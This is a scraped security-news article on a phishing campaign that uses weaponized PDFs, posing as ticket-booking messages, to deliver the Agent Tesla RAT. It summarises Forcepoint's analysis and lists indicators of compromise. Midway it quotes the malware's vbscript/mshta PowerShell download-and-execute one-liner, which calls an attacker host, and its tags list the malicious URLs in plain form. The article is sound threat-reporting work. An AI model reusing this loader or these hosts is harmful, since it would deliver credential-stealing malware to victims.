# Hackers Attacking Online Ticket Booking Users Using Weaponized PDF Files
## Threat actors use weaponized PDF files to exploit vulnerabilities in software which enables them to execute malicious code on a target system
## Information:

+ Link: https://cybersecuritynews.com/?p=58264
+ Source: Cyber Security News
+ Author: Tushar Subhra Dutta
+ Date published: 28 February 2024, 07:37
+ Date scraped: 28 February 2024, 08:02

## Article:
![Main article image](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYjQATUYa8ClvBuSej8cK7xYiyeqab38VLl4zmi2L_dVltwSlcY8QWYiqaWRL0Rx-Z0A5h0n7DO2jVEe2B_cn3EMrA3s9fgL8WR2ylK6e_fHdzE4KGdKw0DlET0XvARE3JveFxEx7GfzxOHkNqBWcHRvy9RVuv1lR5X5mSgrr-1ZeDbluqFR-rcKrvbF4n/s16000/Hackers%20Attacking%20Online%20Ticket%20Booking%20Users%20Using%20Weaponized%20PDF%20Files.webp)


Threat actors use weaponized PDF files to exploit software vulnerabilities, enabling them to execute malicious code on a target system.


PDFs provide a common and trusted format that makes them effective vehicles for delivering malware or launching [phishing attacks](https://cybersecuritynews.com/phishing-attack/). 


Moreover, their ability to embed scripts and multimedia elements also increases the potential for exploitation.


Cybersecurity researchers at Forcepoint recently discovered that hackers actively attack online ticket-booking users using weaponized PDF files.


*You can analyze a malware file, network, module, and registry activity with the*[*ANY.RUN malware sandbox*](https://app.any.run/#register/?utm_source=csnsandgbhackers&utm_medium=article&utm_campaign=rspamd&utm_content=register&utm_term=270224)*, and the*[*Threat Intelligence Lookup*](https://any.run/threat-intelligence-lookup/?utm_source=csnsandgbhackers&utm_medium=article&utm_campaign=rspamd&utm_content=ti&utm_term=270224)*that will let you interact with the OS directly from the browser.*


**Attacking On Online Ticket Booking Users**
--------------------------------------------


New malware versions pop up daily, and authors keep innovating to spread it. In this tactic, threat actors lure users with attachments from various service providers.


In this new campaign, it’s been discovered that a PDF attachment that ends up downloading a RAT to infect the system is delivered via email.



![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJ4rs6nR-eehqXm3s_rO0uylPoxWf6ukqccMycbf20iU2a2jDNrbc7gv2lWUNG9TqZEAASVhJEGka2QUyH50EVRfmWBXiqMT8-fP6Pd2B1u4NuBpeCa1WIVc3ntrcl0SPvV7RSQ_UZlbsbz0ZqlodGNFC-uLGS_xT4PNoZ4gJtyBOsnYUEkYpiJUF842Px/s16000/Malicious%20PDF%20(Source%20-%20Forcepoint).webp)Malicious PDF (Source – Forcepoint)


Here below, we have presented the execution chain:-



![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjB7ug20wN04N1-Tjw6RvLJK3oFrSqfuXgusjt9HWq9UsZj183g_AIRdn7k8CgnLuwm1TofY9qjGhpX56ppwEfVo3gIeJ1UZsQxtYINK-88UV1808TsCkYWKRgBTGW2LIRqqVci4dv9Xa7FMg5BTqNTpkVb6ldWqHkKAwV3HpiGSPLxY84_-8zBMtrcPluK/s16000/Execution%20chain%20(Source%20-%20Forcepoint).webp)Execution chain (Source – Forcepoint)


Researchers [analyzed](https://www.forcepoint.com/blog/x-labs/agent-tesla-malware-attacks-travel-industry) PDFs for malicious attributes, and they used PDFiD for static analysis by scanning for keywords. 


The pdf-parser reveals /ObjStm hiding scripts and URLs. While the PDF employs two methods for the next-stage payload:-


* Fake pop-up triggers URL action [/URI/Type/Action/URI (hxxps://bit[.]ly/newbookingupdates)]. Redirects to hxxps://bio0king[.]blogspot[.]com/ for JavaScript payload download.


* Embedded vbscript ExecuteGlobal code or JavaScript for direct final-stage remote PowerShell payload.


*(vbscript:ExecuteGlobal\(“CreateObject\(“”WScript.Shell””\).Run””powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$\(irm htloctmain25[.]blogspot[.]com//////////////atom.xml\) | . \(‘i\*&\*&&\*x’\).replace\(‘\*&\*&&\*’,’e’\);Start-Sleep -Seconds 5″”,0:Close”\))/F (\\..\\..\\..\\Windows\\System32\\mshta)>>”*


PowerShell uses complex binary obfuscation and replaces the functions to hide and execute malicious scripts. It modifies registries, disables AMSI, adds AV exclusions, and bypasses security features.


The script alters the registry, services, and firewalls, and it also injects processes like Regsvcs.exe and MSbuild.exe.


It connects to “api[.]ipify[.]org” to steal data and send it to a private Telegram chat room. The script also downloads additional payloads from “htljan62024[.]blogspot[.]com” for persistence.


After operations, it drops and executes a {random-name}.dll file, then self-deletes.


Agent Tesla malware surged during the pandemic, and its evolving tactics have persisted in recent years. The campaign involves a PDF in a phishing email from a fake travel agency.


Opening the PDF triggers JavaScript, leading to a multi-stage [PowerShell script](https://cybersecuritynews.com/vice-society-ransomware-2/) with advanced obfuscation. 


And the de-obfuscation reveals techniques for loading [Agent Tesla](https://cybersecuritynews.com/hackers-using-dark-web-quantum-builder-to-launch-agent-tesla-rat-malware/) malware. Meanwhile, successful infiltration enables data theft and command execution on compromised systems.


You can block malware, including Trojans, ransomware, spyware, rootkits, worms, and zero-day exploits, with [**Perimeter81 malware protection**](https://www.perimeter81.com/malware-protection?utm_source=gbhackers&utm_medium=affiliate&utm_campaign=top_articles_gbchakers_cisos_wp&a_aid=2428). All are extremely harmful, can wreak havoc, and damage your network.





## Tags:
***urls***: http://api.ipify.org https://bit.ly/newbookingupdates http://htljan62024.blogspot.com https://bio0king.blogspot.com/ http://htloctmain25.blogspot.com//////////////atom.xml\

### Autogenerated tags:
malware pdf forcepoint javascript powershell
